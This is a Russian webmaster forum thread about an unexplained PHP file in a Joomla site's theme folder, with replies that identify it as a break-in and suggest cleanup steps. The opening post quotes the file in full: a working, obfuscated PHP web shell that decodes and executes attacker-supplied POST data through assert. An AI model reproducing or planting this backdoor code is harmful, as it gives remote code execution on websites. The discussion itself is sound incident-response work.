Форум Сайтостроение Безопасность

На сайте появился новый файл

12 3
D
На сайте с 08.02.2012
Offline
37
dmakcent
7585

На сайте появился новый php со следующим кодом:


<?php 
$ohx=chr(97)."s".chr(115).chr(101)."\x72"."t";
$twu="b".chr(97)."\x73"."\x65"."6".chr(52)."\x5f"."d".chr(101)."c"."\x6f"."d"."\x65";
$ye="s"."t"."\x72"."\x5f"."r"."\x6f"."t"."1".chr(51);
@$ohx(@$twu(@$ye($_POST[chr(100)."a"."\x74"."\x61"])));
die();

Первая переменная $ohx assert

Вторая переменная $twu base64_decode

Третья переменная $ye str_rot13

Что в сумме дает этот код? Это взлом или нет?

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#1

извне можно отрабатывать POST запросы, шифрованные в assert(base64_decode(str_rot13...)))

да взлом, ищите дыру.

все что загрузили не вы на сайт является взломом

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
Muhal4
На сайте с 01.07.2008
Offline
79
Muhal4
#2

В любом случае вам надо просматривать не изменились ли остальные файлы. Обычно такие фокусы не заканчиваются одним левым файликом. Если на аккаунте несколько сайтов, то заражение могло быть через один из них и все имеющиеся сайты в зоне риска. Смотрите дату создания файла и логи.

LinkBoss.net - Трастовые ссылки для увеличения трафика в 10 раз! (http://linkboss.net/)
Проблема с robots.txt Что за это будет? Редирект при открытии сайта
D
На сайте с 08.02.2012
Offline
37
dmakcent
#3
kgtu5:
извне можно отрабатывать POST запросы, шифрованные в assert(base64_decode(str_rot13...)))
да взлом, ищите дыру.
все что загрузили не вы на сайт является взломом

Загрузил не я. Появилась папка новой темы сайта, там 4 файла:

.htaccess

index.html

jtemplate.php

jtemplate.xml

Указанный выше код из jtemplate.php

Muhal4:
В любом случае вам надо просматривать не изменились ли остальные файлы. Обычно такие фокусы не заканчиваются одним левым файликом. Если на аккаунте несколько сайтов, то заражение могло быть через один из них и все имеющиеся сайты в зоне риска. Смотрите дату создания файла и логи.

Остальные файлы не изменились, мне приходит ежедневный отчет.

Эта папка с файлами создается уже второй раз, первый раз попросту удалил.

Сейчас обнулил все файлы, поставил права только чтение на папку и файлы. Что еще стоит предпринять? Дыру найти не так просто, так что ищу альтернативные варианты.

Апдейт зеркальщика. 01.02.2012 вирус в папке sape, Joomla. Не уверен -
Kronbberg
На сайте с 14.03.2011
Offline
62
Kronbberg
#4

Т.е. в папке themes появилась еще одна? А какие темы используете? из официального хранилища или где-то качали на стороне? Сайт на WP,если я все правильно понимаю.

::::::::::LinkBoss.net - Трастовые ссылки для увеличения трафика в 10 раз! (http://linkboss.net/)::::::::::
Alex Klo
На сайте с 15.06.2006
Offline
304
Alex Klo
#5
dmakcent:
Что еще стоит предпринять? Дыру найти не так просто, так что ищу альтернативные варианты.

прогоните файлы сайта Айболитом

Проверка и мониторинг позиций сайта ( http://www.topvisor.ru/?inv=1520 ) Продвигаю сайты http://climat-nw.ru/conditioner-installation/ http://www.aircom-spb.ru/service/montaj/
D
На сайте с 08.02.2012
Offline
37
dmakcent
#6
Kronbberg:
Т.е. в папке themes появилась еще одна? А какие темы используете? из официального хранилища или где-то качали на стороне? Сайт на WP,если я все правильно понимаю.

Joomla

Используется нестандартная тема, качал с сайта разработчика. Так вот вопрос возникает, если тема неактивна, то и код из папки этой темы разве должен выполняться?

---------- Добавлено 28.08.2016 в 16:57 ----------

Alex Klo:
прогоните файлы сайта Айболитом

Прогоню, обязательно.

Как выбрать программиста для Смена движка с минимальными Помогите разобраться
P1otr
На сайте с 13.04.2012
Offline
136
P1otr
#7
dmakcent:
если тема неактивна, то и код из папки этой темы разве должен выполняться?

То что тема неактивная не защищает от использования ее частей в качестве дыры на ваш сайт.

>>>>>>LinkBoss.net - Трастовые ссылки для увеличения трафика в 10 раз! (http://linkboss.net/)<<<<<<
M
На сайте с 06.10.2012
Offline
28
maxikm
#8

Я заметил что эта папка появляется не на всех сайтах, а только где установлен компонент mobile joomla отсюда вывод что папка загружается вместе с обновлением данного компонента.. вопрос как отключить автоматическую загрузку обновлений компонента mobile joomla , понимаю что требуются кое какие изменения в файле /plugins/system/mobilejoomla.php только не знаю чё надо закомментировать... а то достало это обновление.. папка mod-tmp наполняется невероятно быстро, практически каждый день по одной папке install_ задолбался удалять... кто разберется с данным вопросом отпишитесь здесь, чтоб у себя тоже можно было заблокировать автоубдате мобиледжумла

Нужна помощь по работе Joomla. Не уверен - Не удаляются старые сессии
Sergh545
На сайте с 24.02.2011
Offline
124
Sergh545
#9

Народ, кто нашел уязвимость? Актуально.

Оплата зарубежных сервисов, виртуальные бурж карты, получение и отправка SWIFT переводов. ( https://capitalist.net/reg?from=4e4c64388f )
progreccor
На сайте с 08.01.2009
Offline
94
progreccor
#10
Sergh545:
Народ, кто нашел уязвимость? Актуально.

у каждого свой случай.

Уязвимости у каждого свои.

Вначале обновите все свои расширения и саму джумлу до последней.

Какая у вас версия сейчас?

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий